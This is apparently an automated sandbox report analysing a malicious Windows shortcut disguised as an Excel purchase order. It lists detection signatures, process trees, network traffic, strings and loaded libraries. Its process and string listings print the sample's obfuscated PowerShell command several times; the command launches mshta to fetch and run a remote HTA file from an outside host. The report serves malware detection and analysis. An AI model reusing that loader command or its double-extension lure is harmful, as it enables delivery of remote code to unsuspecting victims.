Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk

Overview

General Information

Sample name:#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
renamed because original name is a hash value
Original sample name: BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
Analysis ID:1430753
MD5:4a606840f1c2b5b09ea0de48beafc438
SHA1:052f71b748a4f2b545c20a706da7415917a635f5
SHA256:a27d930564362de498069ac312167b9c958b870c261ddda90754008fb3911fbb
Tags:lnk
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • powershell.exe (PID: 5164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 6544 cmdline: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta, CommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta, ProcessId: 6544, ProcessName: mshta.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta, ProcessId: 5164, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 988, ProcessName: svchost.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkAvira: detected
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkReversingLabs: Detection: 18%
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkVirustotal: Detection: 20%Perma Link
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000004.00000002.3450455572.000001C167E72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B9652C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E32000.00000004.00000020.00020000.00000000.sdmp, drip[1].hta.4.dr
Source: Binary string: calc.pdb source: mshta.exe, 00000004.00000002.3450455572.000001C167E72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E32000.00000004.00000020.00020000.00000000.sdmp, drip[1].hta.4.dr
Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /assets/aw/drip.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /assets/aw/drip.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: www.sessosesso.it
Source: svchost.exe, 00000006.00000002.3450474080.0000019951400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000006.00000003.2243523519.00000199511D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000004.00000002.3448055036.000001B9652B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/
Source: mshta.exe, 00000004.00000002.3448055036.000001B9652B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/)
Source: mshta.exe, 00000004.00000002.3448055036.000001B965207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B9652B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta
Source: mshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta(e
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta...
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta...BA
Source: mshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta0?i
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta4C
Source: mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta7
Source: mshta.exe, 00000004.00000002.3448055036.000001B965207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.hta=
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaAC:
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B965200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaC:
Source: mshta.exe, 00000004.00000002.3448478474.000001B9653E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaH
Source: mshta.exe, 00000004.00000002.3449395275.000001C1671C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaHu
Source: mshta.exe, 00000004.00000002.3448055036.000001B965207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaK
Source: mshta.exe, 00000004.00000002.3448813809.000001B9654A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaROWSEo
Source: mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaX
Source: mshta.exe, 00000004.00000002.3448055036.000001B965200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaa
Source: mshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htadows
Source: mshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htadowsINetCache
Source: mshta.exe, 00000004.00000002.3449395275.000001C16721C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3451579890.000001C16978F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htahis
Source: mshta.exe, 00000004.00000002.3451288746.000001C169695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.hta
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htapage.
Source: mshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htapmwi
Source: mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sessosesso.it/assets/aw/drip.htaq
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.6:49720 version: TLS 1.2

System Summary

barindex
Source: Initial fileStrings: https://www.sessosesso.it/assets/aw/drip.htaAC:
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkLNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal88.rans.evad.winLNK@5/14@1/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\drip[1].htaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5vs2ci.kot.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkReversingLabs: Detection: 18%
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkVirustotal: Detection: 20%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.htaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
